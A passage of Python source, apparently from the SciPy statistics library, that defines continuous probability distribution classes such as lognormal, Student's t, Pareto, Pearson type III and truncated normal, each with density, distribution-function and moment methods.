return where(q < 0.5, (2.0*q)**(1.0/c), (2*(1.0-q))**(-1.0/c))
def _munp(self, n, c):
return c**2 / (c**2 - n**2)
def _entropy(self, c):
return log(2.0/c) + 1.0
loglaplace = loglaplace_gen(a=0.0, name='loglaplace')
def _lognorm_logpdf(x, s):
return -log(x)**2 / (2*s**2) + np.where(x == 0, 0, -log(s*x*sqrt(2*pi)))
class lognorm_gen(rv_continuous):
"""A lognormal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `lognorm` is::
lognorm.pdf(x, s) = 1 / (s*x*sqrt(2*pi)) * exp(-1/2*(log(x)/s)**2)
for ``x > 0``, ``s > 0``.
If ``log(x)`` is normally distributed with mean ``mu`` and variance
``sigma**2``, then ``x`` is log-normally distributed with shape parameter
sigma and scale parameter ``exp(mu)``.
%(example)s
"""
def _rvs(self, s):
return exp(s * self._random_state.standard_normal(self._size))
def _pdf(self, x, s):
return exp(self._logpdf(x, s))
def _logpdf(self, x, s):
return _lognorm_logpdf(x, s)
def _cdf(self, x, s):
return _norm_cdf(log(x) / s)
def _ppf(self, q, s):
return exp(s * _norm_ppf(q))
def _stats(self, s):
p = exp(s*s)
mu = sqrt(p)
mu2 = p*(p-1)
g1 = sqrt((p-1))*(2+p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self, s):
return 0.5 * (1 + log(2*pi) + 2 * log(s))
lognorm = lognorm_gen(a=0.0, name='lognorm')
class gilbrat_gen(rv_continuous):
"""A Gilbrat continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gilbrat` is::
gilbrat.pdf(x) = 1/(x*sqrt(2*pi)) * exp(-1/2*(log(x))**2)
`gilbrat` is a special case of `lognorm` with ``s = 1``.
%(example)s
"""
def _rvs(self):
return exp(self._random_state.standard_normal(self._size))
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return _lognorm_logpdf(x, 1.0)
def _cdf(self, x):
return _norm_cdf(log(x))
def _ppf(self, q):
return exp(_norm_ppf(q))
def _stats(self):
p = np.e
mu = sqrt(p)
mu2 = p * (p - 1)
g1 = sqrt((p - 1)) * (2 + p)
g2 = np.polyval([1, 2, 3, 0, -6.0], p)
return mu, mu2, g1, g2
def _entropy(self):
return 0.5 * log(2 * pi) + 0.5
gilbrat = gilbrat_gen(a=0.0, name='gilbrat')
class maxwell_gen(rv_continuous):
"""A Maxwell continuous random variable.
%(before_notes)s
Notes
-----
A special case of a `chi` distribution, with ``df = 3``, ``loc = 0.0``,
and given ``scale = a``, where ``a`` is the parameter used in the
Mathworld description [1]_.
The probability density function for `maxwell` is::
maxwell.pdf(x) = sqrt(2/pi)x**2 * exp(-x**2/2)
for ``x > 0``.
References
----------
.. [1] http://mathworld.wolfram.com/MaxwellDistribution.html
%(example)s
"""
def _rvs(self):
return chi.rvs(3.0, size=self._size, random_state=self._random_state)
def _pdf(self, x):
return sqrt(2.0/pi)*x*x*exp(-x*x/2.0)
def _cdf(self, x):
return special.gammainc(1.5, x*x/2.0)
def _ppf(self, q):
return sqrt(2*special.gammaincinv(1.5, q))
def _stats(self):
val = 3*pi-8
return (2*sqrt(2.0/pi), 3-8/pi, sqrt(2)*(32-10*pi)/val**1.5,
(-12*pi*pi + 160*pi - 384) / val**2.0)
def _entropy(self):
return _EULER + 0.5*log(2*pi)-0.5
maxwell = maxwell_gen(a=0.0, name='maxwell')
class mielke_gen(rv_continuous):
"""A Mielke's Beta-Kappa continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `mielke` is::
mielke.pdf(x, k, s) = k * x**(k-1) / (1+x**s)**(1+k/s)
for ``x > 0``.
%(example)s
"""
def _pdf(self, x, k, s):
return k*x**(k-1.0) / (1.0+x**s)**(1.0+k*1.0/s)
def _cdf(self, x, k, s):
return x**k / (1.0+x**s)**(k*1.0/s)
def _ppf(self, q, k, s):
qsk = pow(q, s*1.0/k)
return pow(qsk/(1.0-qsk), 1.0/s)
mielke = mielke_gen(a=0.0, name='mielke')
class nakagami_gen(rv_continuous):
"""A Nakagami continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `nakagami` is::
nakagami.pdf(x, nu) = 2 * nu**nu / gamma(nu) *
x**(2*nu-1) * exp(-nu*x**2)
for ``x > 0``, ``nu > 0``.
%(example)s
"""
def _pdf(self, x, nu):
return 2*nu**nu/gam(nu)*(x**(2*nu-1.0))*exp(-nu*x*x)
def _cdf(self, x, nu):
return special.gammainc(nu, nu*x*x)
def _ppf(self, q, nu):
return sqrt(1.0/nu*special.gammaincinv(nu, q))
def _stats(self, nu):
mu = gam(nu+0.5)/gam(nu)/sqrt(nu)
mu2 = 1.0-mu*mu
g1 = mu * (1 - 4*nu*mu2) / 2.0 / nu / np.power(mu2, 1.5)
g2 = -6*mu**4*nu + (8*nu-2)*mu**2-2*nu + 1
g2 /= nu*mu2**2.0
return mu, mu2, g1, g2
nakagami = nakagami_gen(a=0.0, name="nakagami")
class ncx2_gen(rv_continuous):
"""A non-central chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncx2` is::
ncx2.pdf(x, df, nc) = exp(-(nc+x)/2) * 1/2 * (x/nc)**((df-2)/4)
* I[(df-2)/2](sqrt(nc*x))
for ``x > 0``.
%(example)s
"""
def _rvs(self, df, nc):
return self._random_state.noncentral_chisquare(df, nc, self._size)
def _logpdf(self, x, df, nc):
return _ncx2_log_pdf(x, df, nc)
def _pdf(self, x, df, nc):
return _ncx2_pdf(x, df, nc)
def _cdf(self, x, df, nc):
return _ncx2_cdf(x, df, nc)
def _ppf(self, q, df, nc):
return special.chndtrix(q, df, nc)
def _stats(self, df, nc):
val = df + 2.0*nc
return (df + nc, 2*val, sqrt(8)*(val+nc)/val**1.5,
12.0*(val+2*nc)/val**2.0)
ncx2 = ncx2_gen(a=0.0, name='ncx2')
class ncf_gen(rv_continuous):
"""A non-central F distribution continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncf` is::
ncf.pdf(x, df1, df2, nc) = exp(nc/2 + nc*df1*x/(2*(df1*x+df2))) *
df1**(df1/2) * df2**(df2/2) * x**(df1/2-1) *
(df2+df1*x)**(-(df1+df2)/2) *
gamma(df1/2)*gamma(1+df2/2) *
L^{v1/2-1}^{v2/2}(-nc*v1*x/(2*(v1*x+v2))) /
(B(v1/2, v2/2) * gamma((v1+v2)/2))
for ``df1, df2, nc > 0``.
%(example)s
"""
def _rvs(self, dfn, dfd, nc):
return self._random_state.noncentral_f(dfn, dfd, nc, self._size)
def _pdf_skip(self, x, dfn, dfd, nc):
n1, n2 = dfn, dfd
term = -nc/2+nc*n1*x/(2*(n2+n1*x)) + gamln(n1/2.)+gamln(1+n2/2.)
term -= gamln((n1+n2)/2.0)
Px = exp(term)
Px *= n1**(n1/2) * n2**(n2/2) * x**(n1/2-1)
Px *= (n2+n1*x)**(-(n1+n2)/2)
Px *= special.assoc_laguerre(-nc*n1*x/(2.0*(n2+n1*x)), n2/2, n1/2-1)
Px /= special.beta(n1/2, n2/2)
# This function does not have a return. Drop it for now, the generic
# function seems to work OK.
def _cdf(self, x, dfn, dfd, nc):
return special.ncfdtr(dfn, dfd, nc, x)
def _ppf(self, q, dfn, dfd, nc):
return special.ncfdtri(dfn, dfd, nc, q)
def _munp(self, n, dfn, dfd, nc):
val = (dfn * 1.0/dfd)**n
term = gamln(n+0.5*dfn) + gamln(0.5*dfd-n) - gamln(dfd*0.5)
val *= exp(-nc / 2.0+term)
val *= special.hyp1f1(n+0.5*dfn, 0.5*dfn, 0.5*nc)
return val
def _stats(self, dfn, dfd, nc):
mu = where(dfd <= 2, inf, dfd / (dfd-2.0)*(1+nc*1.0/dfn))
mu2 = where(dfd <= 4, inf, 2*(dfd*1.0/dfn)**2.0 *
((dfn+nc/2.0)**2.0 + (dfn+nc)*(dfd-2.0)) /
((dfd-2.0)**2.0 * (dfd-4.0)))
return mu, mu2, None, None
ncf = ncf_gen(a=0.0, name='ncf')
class t_gen(rv_continuous):
"""A Student's T continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `t` is::
gamma((df+1)/2)
t.pdf(x, df) = ---------------------------------------------------
sqrt(pi*df) * gamma(df/2) * (1+x**2/df)**((df+1)/2)
for ``df > 0``.
%(example)s
"""
def _rvs(self, df):
return self._random_state.standard_t(df, size=self._size)
def _pdf(self, x, df):
r = asarray(df*1.0)
Px = exp(gamln((r+1)/2)-gamln(r/2))
Px /= sqrt(r*pi)*(1+(x**2)/r)**((r+1)/2)
return Px
def _logpdf(self, x, df):
r = df*1.0
lPx = gamln((r+1)/2)-gamln(r/2)
lPx -= 0.5*log(r*pi) + (r+1)/2*log(1+(x**2)/r)
return lPx
def _cdf(self, x, df):
return special.stdtr(df, x)
def _sf(self, x, df):
return special.stdtr(df, -x)
def _ppf(self, q, df):
return special.stdtrit(df, q)
def _isf(self, q, df):
return -special.stdtrit(df, q)
def _stats(self, df):
mu2 = where(df > 2, df / (df-2.0), inf)
g1 = where(df > 3, 0.0, nan)
g2 = where(df > 4, 6.0/(df-4.0), nan)
return 0, mu2, g1, g2
t = t_gen(name='t')
class nct_gen(rv_continuous):
"""A non-central Student's T continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `nct` is::
df**(df/2) * gamma(df+1)
nct.pdf(x, df, nc) = ----------------------------------------------------
2**df*exp(nc**2/2) * (df+x**2)**(df/2) * gamma(df/2)
for ``df > 0``.
%(example)s
"""
def _argcheck(self, df, nc):
return (df > 0) & (nc == nc)
def _rvs(self, df, nc):
sz, rndm = self._size, self._random_state
n = norm.rvs(loc=nc, size=sz, random_state=rndm)
c2 = chi2.rvs(df, size=sz, random_state=rndm)
return n * sqrt(df) / sqrt(c2)
def _pdf(self, x, df, nc):
n = df*1.0
nc = nc*1.0
x2 = x*x
ncx2 = nc*nc*x2
fac1 = n + x2
trm1 = n/2.*log(n) + gamln(n+1)
trm1 -= n*log(2)+nc*nc/2.+(n/2.)*log(fac1)+gamln(n/2.)
Px = exp(trm1)
valF = ncx2 / (2*fac1)
trm1 = sqrt(2)*nc*x*special.hyp1f1(n/2+1, 1.5, valF)
trm1 /= asarray(fac1*special.gamma((n+1)/2))
trm2 = special.hyp1f1((n+1)/2, 0.5, valF)
trm2 /= asarray(sqrt(fac1)*special.gamma(n/2+1))
Px *= trm1+trm2
return Px
def _cdf(self, x, df, nc):
return special.nctdtr(df, nc, x)
def _ppf(self, q, df, nc):
return special.nctdtrit(df, nc, q)
def _stats(self, df, nc, moments='mv'):
#
# See D. Hogben, R.S. Pinkham, and M.B. Wilk,
# 'The moments of the non-central t-distribution'
# Biometrika 48, p. 465 (2961).
# e.g. http://www.jstor.org/stable/2332772 (gated)
#
mu, mu2, g1, g2 = None, None, None, None
gfac = gam(df/2.-0.5) / gam(df/2.)
c11 = sqrt(df/2.) * gfac
c20 = df / (df-2.)
c22 = c20 - c11*c11
mu = np.where(df > 1, nc*c11, np.inf)
mu2 = np.where(df > 2, c22*nc*nc + c20, np.inf)
if 's' in moments:
c33t = df * (7.-2.*df) / (df-2.) / (df-3.) + 2.*c11*c11
c31t = 3.*df / (df-2.) / (df-3.)
mu3 = (c33t*nc*nc + c31t) * c11*nc
g1 = np.where(df > 3, mu3 / np.power(mu2, 1.5), np.nan)
#kurtosis
if 'k' in moments:
c44 = df*df / (df-2.) / (df-4.)
c44 -= c11*c11 * 2.*df*(5.-df) / (df-2.) / (df-3.)
c44 -= 3.*c11**4
c42 = df / (df-4.) - c11*c11 * (df-1.) / (df-3.)
c42 *= 6.*df / (df-2.)
c40 = 3.*df*df / (df-2.) / (df-4.)
mu4 = c44 * nc**4 + c42*nc**2 + c40
g2 = np.where(df > 4, mu4/mu2**2 - 3., np.nan)
return mu, mu2, g1, g2
nct = nct_gen(name="nct")
class pareto_gen(rv_continuous):
"""A Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pareto` is::
pareto.pdf(x, b) = b / x**(b+1)
for ``x >= 1``, ``b > 0``.
%(example)s
"""
def _pdf(self, x, b):
return b * x**(-b-1)
def _cdf(self, x, b):
return 1 - x**(-b)
def _ppf(self, q, b):
return pow(1-q, -1.0/b)
def _stats(self, b, moments='mv'):
mu, mu2, g1, g2 = None, None, None, None
if 'm' in moments:
mask = b > 1
bt = extract(mask, b)
mu = valarray(shape(b), value=inf)
place(mu, mask, bt / (bt-1.0))
if 'v' in moments:
mask = b > 2
bt = extract(mask, b)
mu2 = valarray(shape(b), value=inf)
place(mu2, mask, bt / (bt-2.0) / (bt-1.0)**2)
if 's' in moments:
mask = b > 3
bt = extract(mask, b)
g1 = valarray(shape(b), value=nan)
vals = 2 * (bt + 1.0) * sqrt(bt - 2.0) / ((bt - 3.0) * sqrt(bt))
place(g1, mask, vals)
if 'k' in moments:
mask = b > 4
bt = extract(mask, b)
g2 = valarray(shape(b), value=nan)
vals = (6.0*polyval([1.0, 1.0, -6, -2], bt) /
polyval([1.0, -7.0, 12.0, 0.0], bt))
place(g2, mask, vals)
return mu, mu2, g1, g2
def _entropy(self, c):
return 1 + 1.0/c - log(c)
pareto = pareto_gen(a=1.0, name="pareto")
class lomax_gen(rv_continuous):
"""A Lomax (Pareto of the second kind) continuous random variable.
%(before_notes)s
Notes
-----
The Lomax distribution is a special case of the Pareto distribution, with
(loc=-1.0).
The probability density function for `lomax` is::
lomax.pdf(x, c) = c / (1+x)**(c+1)
for ``x >= 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return c*1.0/(1.0+x)**(c+1.0)
def _logpdf(self, x, c):
return log(c) - (c+1)*log(1+x)
def _cdf(self, x, c):
return 1.0-1.0/(1.0+x)**c
def _sf(self, x, c):
return 1.0/(1.0+x)**c
def _logsf(self, x, c):
return -c*log(1+x)
def _ppf(self, q, c):
return pow(1.0-q, -1.0/c)-1
def _stats(self, c):
mu, mu2, g1, g2 = pareto.stats(c, loc=-1.0, moments='mvsk')
return mu, mu2, g1, g2
def _entropy(self, c):
return 1+1.0/c-log(c)
lomax = lomax_gen(a=0.0, name="lomax")
class pearson3_gen(rv_continuous):
"""A pearson type III continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pearson3` is::
pearson3.pdf(x, skew) = abs(beta) / gamma(alpha) *
(beta * (x - zeta))**(alpha - 1) * exp(-beta*(x - zeta))
where::
beta = 2 / (skew * stddev)
alpha = (stddev * beta)**2
zeta = loc - alpha / beta
%(example)s
References
----------
R.W. Vogel and D.E. McMartin, "Probability Plot Goodness-of-Fit and
Skewness Estimation Procedures for the Pearson Type 3 Distribution", Water
Resources Research, Vol.27, 3149-3158 (1991).
L.R. Salvosa, "Tables of Pearson's Type III Function", Ann. Math. Statist.,
Vol.1, 191-198 (1930).
"Using Modern Computing Tools to Fit the Pearson Type III Distribution to
Aviation Loads Data", Office of Aviation Research (2003).
"""
def _preprocess(self, x, skew):
# The real 'loc' and 'scale' are handled in the calling pdf(...). The
# local variables 'loc' and 'scale' within pearson3._pdf are set to
# the defaults just to keep them as part of the equations for
# documentation.
loc = 0.0
scale = 1.0
# If skew is small, return _norm_pdf. The divide between pearson3
# and norm was found by brute force and is approximately a skew of
# 0.000016. No one, I hope, would actually use a skew value even
# close to this small.
norm2pearson_transition = 0.000016
ans, x, skew = np.broadcast_arrays([1.0], x, skew)
ans = ans.copy()
mask = np.absolute(skew) < norm2pearson_transition
invmask = ~mask
beta = 2.0 / (skew[invmask] * scale)
alpha = (scale * beta)**2
zeta = loc - alpha / beta
transx = beta * (x[invmask] - zeta)
return ans, x, transx, skew, mask, invmask, beta, alpha, zeta
def _argcheck(self, skew):
# The _argcheck function in rv_continuous only allows positive
# arguments. The skew argument for pearson3 can be zero (which I want
# to handle inside pearson3._pdf) or negative. So just return True
# for all skew args.
return np.ones(np.shape(skew), dtype=bool)
def _stats(self, skew):
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess([1], skew))
m = zeta + alpha / beta
v = alpha / (beta**2)
s = 2.0 / (alpha**0.5) * np.sign(beta)
k = 6.0 / alpha
return m, v, s, k
def _pdf(self, x, skew):
# Do the calculation in _logpdf since helps to limit
# overflow/underflow problems
ans = exp(self._logpdf(x, skew))
if ans.ndim == 0:
if np.isnan(ans):
return 0.0
return ans
ans[np.isnan(ans)] = 0.0
return ans
def _logpdf(self, x, skew):
# PEARSON3 logpdf GAMMA logpdf
# np.log(abs(beta))
# + (alpha - 1)*log(beta*(x - zeta)) + (a - 1)*log(x)
# - beta*(x - zeta) - x
# - gamln(alpha) - gamln(a)
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess(x, skew))
ans[mask] = np.log(_norm_pdf(x[mask]))
ans[invmask] = log(abs(beta)) + gamma._logpdf(transx, alpha)
return ans
def _cdf(self, x, skew):
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess(x, skew))
ans[mask] = _norm_cdf(x[mask])
ans[invmask] = gamma._cdf(transx, alpha)
return ans
def _rvs(self, skew):
ans, x, transx, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess([0], skew))
if mask[0]:
return self._random_state.standard_normal(self._size)
ans = self._random_state.standard_gamma(alpha, self._size)/beta + zeta
if ans.size == 1:
return ans[0]
return ans
def _ppf(self, q, skew):
ans, q, transq, skew, mask, invmask, beta, alpha, zeta = (
self._preprocess(q, skew))
ans[mask] = _norm_ppf(q[mask])
ans[invmask] = special.gammaincinv(alpha, q[invmask])/beta + zeta
return ans
pearson3 = pearson3_gen(name="pearson3")
class powerlaw_gen(rv_continuous):
"""A power-function continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlaw` is::
powerlaw.pdf(x, a) = a * x**(a-1)
for ``0 <= x <= 1``, ``a > 0``.
`powerlaw` is a special case of `beta` with ``b == 1``.
%(example)s
"""
def _pdf(self, x, a):
return a*x**(a-1.0)
def _logpdf(self, x, a):
return log(a) + special.xlogy(a - 1, x)
def _cdf(self, x, a):
return x**(a*1.0)
def _logcdf(self, x, a):
return a*log(x)
def _ppf(self, q, a):
return pow(q, 1.0/a)
def _stats(self, a):
return (a / (a + 1.0),
a / (a + 2.0) / (a + 1.0) ** 2,
-2.0 * ((a - 1.0) / (a + 3.0)) * sqrt((a + 2.0) / a),
6 * polyval([1, -1, -6, 2], a) / (a * (a + 3.0) * (a + 4)))
def _entropy(self, a):
return 1 - 1.0/a - log(a)
powerlaw = powerlaw_gen(a=0.0, b=1.0, name="powerlaw")
class powerlognorm_gen(rv_continuous):
"""A power log-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlognorm` is::
powerlognorm.pdf(x, c, s) = c / (x*s) * phi(log(x)/s) *
(Phi(-log(x)/s))**(c-1),
where ``phi`` is the normal pdf, and ``Phi`` is the normal cdf,
and ``x > 0``, ``s, c > 0``.
%(example)s
"""
def _pdf(self, x, c, s):
return (c/(x*s) * _norm_pdf(log(x)/s) *
pow(_norm_cdf(-log(x)/s), c*1.0-1.0))
def _cdf(self, x, c, s):
return 1.0 - pow(_norm_cdf(-log(x)/s), c*1.0)
def _ppf(self, q, c, s):
return exp(-s * _norm_ppf(pow(1.0 - q, 1.0 / c)))
powerlognorm = powerlognorm_gen(a=0.0, name="powerlognorm")
class powernorm_gen(rv_continuous):
"""A power normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powernorm` is::
powernorm.pdf(x, c) = c * phi(x) * (Phi(-x))**(c-1)
where ``phi`` is the normal pdf, and ``Phi`` is the normal cdf,
and ``x > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return (c*_norm_pdf(x) * (_norm_cdf(-x)**(c-1.0)))
def _logpdf(self, x, c):
return log(c) + _norm_logpdf(x) + (c-1)*_norm_logcdf(-x)
def _cdf(self, x, c):
return 1.0-_norm_cdf(-x)**(c*1.0)
def _ppf(self, q, c):
return -_norm_ppf(pow(1.0 - q, 1.0 / c))
powernorm = powernorm_gen(name='powernorm')
class rdist_gen(rv_continuous):
"""An R-distributed continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rdist` is::
rdist.pdf(x, c) = (1-x**2)**(c/2-1) / B(1/2, c/2)
for ``-1 <= x <= 1``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return np.power((1.0 - x**2), c / 2.0 - 1) / special.beta(0.5, c / 2.0)
def _cdf(self, x, c):
term1 = x / special.beta(0.5, c / 2.0)
res = 0.5 + term1 * special.hyp2f1(0.5, 1 - c / 2.0, 1.5, x**2)
# There's an issue with hyp2f1, it returns nans near x = +-1, c > 100.
# Use the generic implementation in that case. See gh-1285 for
# background.
if any(np.isnan(res)):
return rv_continuous._cdf(self, x, c)
return res
def _munp(self, n, c):
numerator = (1 - (n % 2)) * special.beta((n + 1.0) / 2, c / 2.0)
return numerator / special.beta(1. / 2, c / 2.)
rdist = rdist_gen(a=-1.0, b=1.0, name="rdist")
class rayleigh_gen(rv_continuous):
"""A Rayleigh continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rayleigh` is::
rayleigh.pdf(r) = r * exp(-r**2/2)
for ``x >= 0``.
`rayleigh` is a special case of `chi` with ``df == 2``.
%(example)s
"""
def _rvs(self):
return chi.rvs(2, size=self._size, random_state=self._random_state)
def _pdf(self, r):
return r * exp(-0.5 * r**2)
def _cdf(self, r):
return 1 - exp(-0.5 * r**2)
def _ppf(self, q):
return sqrt(-2 * log(1 - q))
def _stats(self):
val = 4 - pi
return (np.sqrt(pi/2), val/2, 2*(pi-3)*sqrt(pi)/val**1.5,
6*pi/val-16/val**2)
def _entropy(self):
return _EULER/2.0 + 1 - 0.5*log(2)
rayleigh = rayleigh_gen(a=0.0, name="rayleigh")
class reciprocal_gen(rv_continuous):
"""A reciprocal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `reciprocal` is::
reciprocal.pdf(x, a, b) = 1 / (x*log(b/a))
for ``a <= x <= b``, ``a, b > 0``.
%(example)s
"""
def _argcheck(self, a, b):
self.a = a
self.b = b
self.d = log(b*1.0 / a)
return (a > 0) & (b > 0) & (b > a)
def _pdf(self, x, a, b):
return 1.0 / (x * self.d)
def _logpdf(self, x, a, b):
return -log(x) - log(self.d)
def _cdf(self, x, a, b):
return (log(x)-log(a)) / self.d
def _ppf(self, q, a, b):
return a*pow(b*1.0/a, q)
def _munp(self, n, a, b):
return 1.0/self.d / n * (pow(b*1.0, n) - pow(a*1.0, n))
def _entropy(self, a, b):
return 0.5*log(a*b)+log(log(b/a))
reciprocal = reciprocal_gen(name="reciprocal")
# FIXME: PPF does not work.
class rice_gen(rv_continuous):
"""A Rice continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rice` is::
rice.pdf(x, b) = x * exp(-(x**2+b**2)/2) * I[0](x*b)
for ``x > 0``, ``b > 0``.
%(example)s
"""
def _argcheck(self, b):
return b >= 0
def _rvs(self, b):
# http://en.wikipedia.org/wiki/Rice_distribution
sz = self._size if self._size else 1
t = b/np.sqrt(2) + self._random_state.standard_normal(size=(2, sz))
return np.sqrt((t*t).sum(axis=0))
def _pdf(self, x, b):
return x * exp(-(x-b)*(x-b)/2.0) * special.i0e(x*b)
def _munp(self, n, b):
nd2 = n/2.0
n1 = 1 + nd2
b2 = b*b/2.0
return (2.0**(nd2) * exp(-b2) * special.gamma(n1) *
special.hyp1f1(n1, 1, b2))
rice = rice_gen(a=0.0, name="rice")
# FIXME: PPF does not work.
class recipinvgauss_gen(rv_continuous):
"""A reciprocal inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `recipinvgauss` is::
recipinvgauss.pdf(x, mu) = 1/sqrt(2*pi*x) * exp(-(1-mu*x)**2/(2*x*mu**2))
for ``x >= 0``.
%(example)s
"""
def _rvs(self, mu):
return 1.0/self._random_state.wald(mu, 1.0, size=self._size)
def _pdf(self, x, mu):
return 1.0/sqrt(2*pi*x)*exp(-(1-mu*x)**2.0 / (2*x*mu**2.0))
def _logpdf(self, x, mu):
return -(1-mu*x)**2.0 / (2*x*mu**2.0) - 0.5*log(2*pi*x)
def _cdf(self, x, mu):
trm1 = 1.0/mu - x
trm2 = 1.0/mu + x
isqx = 1.0/sqrt(x)
return 1.0-_norm_cdf(isqx*trm1)-exp(2.0/mu)*_norm_cdf(-isqx*trm2)
recipinvgauss = recipinvgauss_gen(a=0.0, name='recipinvgauss')
class semicircular_gen(rv_continuous):
"""A semicircular continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `semicircular` is::
semicircular.pdf(x) = 2/pi * sqrt(1-x**2)
for ``-1 <= x <= 1``.
%(example)s
"""
def _pdf(self, x):
return 2.0/pi*sqrt(1-x*x)
def _cdf(self, x):
return 0.5+1.0/pi*(x*sqrt(1-x*x) + arcsin(x))
def _stats(self):
return 0, 0.25, 0, -1.0
def _entropy(self):
return 0.64472988584940017414
semicircular = semicircular_gen(a=-1.0, b=1.0, name="semicircular")
class triang_gen(rv_continuous):
"""A triangular continuous random variable.
%(before_notes)s
Notes
-----
The triangular distribution can be represented with an up-sloping line from
``loc`` to ``(loc + c*scale)`` and then downsloping for ``(loc + c*scale)``
to ``(loc+scale)``.
The standard form is in the range [0, 1] with c the mode.
The location parameter shifts the start to `loc`.
The scale parameter changes the width from 1 to `scale`.
%(example)s
"""
def _rvs(self, c):
return self._random_state.triangular(0, c, 1, self._size)
def _argcheck(self, c):
return (c >= 0) & (c <= 1)
def _pdf(self, x, c):
return where(x < c, 2*x/c, 2*(1-x)/(1-c))
def _cdf(self, x, c):
return where(x < c, x*x/c, (x*x-2*x+c)/(c-1))
def _ppf(self, q, c):
return where(q < c, sqrt(c*q), 1-sqrt((1-c)*(1-q)))
def _stats(self, c):
return (c+1.0)/3.0, (1.0-c+c*c)/18, sqrt(2)*(2*c-1)*(c+1)*(c-2) / \
(5 * np.power((1.0-c+c*c), 1.5)), -3.0/5.0
def _entropy(self, c):
return 0.5-log(2)
triang = triang_gen(a=0.0, b=1.0, name="triang")
class truncexpon_gen(rv_continuous):
"""A truncated exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `truncexpon` is::
truncexpon.pdf(x, b) = exp(-x) / (1-exp(-b))
for ``0 < x < b``.
%(example)s
"""
def _argcheck(self, b):
self.b = b
return (b > 0)
def _pdf(self, x, b):
return exp(-x)/(1-exp(-b))
def _logpdf(self, x, b):
return -x - log(1-exp(-b))
def _cdf(self, x, b):
return (1.0-exp(-x))/(1-exp(-b))
def _ppf(self, q, b):
return -log(1-q+q*exp(-b))
def _munp(self, n, b):
# wrong answer with formula, same as in continuous.pdf
# return gam(n+1)-special.gammainc(1+n, b)
if n == 1:
return (1-(b+1)*exp(-b))/(-special.expm1(-b))
elif n == 2:
return 2*(1-0.5*(b*b+2*b+2)*exp(-b))/(-special.expm1(-b))
else:
# return generic for higher moments
# return rv_continuous._mom1_sc(self, n, b)
return self._mom1_sc(n, b)
def _entropy(self, b):
eB = exp(b)
return log(eB-1)+(1+eB*(b-1.0))/(1.0-eB)
truncexpon = truncexpon_gen(a=0.0, name='truncexpon')
class truncnorm_gen(rv_continuous):
"""A truncated normal continuous random variable.
%(before_notes)s
Notes
-----
The standard form of this distribution is a standard normal truncated to
the range [a, b] --- notice that a and b are defined over the domain of the
standard normal. To convert clip values for a specific mean and standard
deviation, use::
a, b = (myclip_a - my_mean) / my_std, (myclip_b - my_mean) / my_std
%(example)s
"""
def _argcheck(self, a, b):
self.a = a
self.b = b
self._nb = _norm_cdf(b)
self._na = _norm_cdf(a)
self._sb = _norm_sf(b)
self._sa = _norm_sf(a)
if self.a > 0:
self._delta = -(self._sb - self._sa)
else:
self._delta = self._nb - self._na
self._logdelta = log(self._delta)
return (a != b)
def _pdf(self, x, a, b):
return _norm_pdf(x) / self._delta
def _logpdf(self, x, a, b):
return _norm_logpdf(x) - self._logdelta
def _cdf(self, x, a, b):
return (_norm_cdf(x) - self._na) / self._delta
def _ppf(self, q, a, b):
if self.a > 0:
return _norm_isf(q*self._sb + self._sa*(1.0-q))
else:
return _norm_ppf(q*self._nb + self._na*(1.0-q))
def _stats(self, a, b):
nA, nB = self._na, self._nb
d = nB - nA
pA, pB = _norm_pdf(a), _norm_pdf(b)
mu = (pA - pB) / d # correction sign
mu2 = 1 + (a*pA - b*pB) / d - mu*mu
return mu, mu2, None, None
truncnorm = truncnorm_gen(name='truncnorm')
# FIXME: RVS does not work.
class tukeylambda_gen(rv_continuous):
"""A Tukey-Lamdba continuous random variable.
%(before_notes)s
Notes
-----
A flexible distribution, able to represent and interpolate between the
following distributions:
- Cauchy (lam=-1)
- logistic (lam=0.0)
- approx Normal (lam=0.14)
- u-shape (lam = 0.5)
- uniform from -1 to 1 (lam = 1)
%(example)s
"""
def _argcheck(self, lam):
return np.ones(np.shape(lam), dtype=bool)
def _pdf(self, x, lam):
Fx = asarray(special.tklmbda(x, lam))
Px = Fx**(lam-1.0) + (asarray(1-Fx))**(lam-1.0)
Px = 1.0/asarray(Px)
return where((lam <= 0) | (abs(x) < 1.0/asarray(lam)), Px, 0.0)
def _cdf(self, x, lam):
return special.tklmbda(x, lam)
def _ppf(self, q, lam):
q = q*1.0
vals1 = (q**lam - (1-q)**lam)/lam
vals2 = log(q/(1-q))
return where((lam == 0) & (q == q), vals2, vals1)
def _stats(self, lam):
return 0, _tlvar(lam), 0, _tlkurt(lam)
def _entropy(self, lam):
def integ(p):
return log(pow(p, lam-1)+pow(1-p, lam-1))
return integrate.quad(integ, 0, 1)[0]
tukeylambda = tukeylambda_gen(name='tukeylambda')
class uniform_gen(rv_continuous):
"""A uniform continuous random variable.
This distribution is constant between `loc` and ``loc + scale``.
%(before_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.uniform(0.0, 1.0, self._size)
def _pdf(self, x):
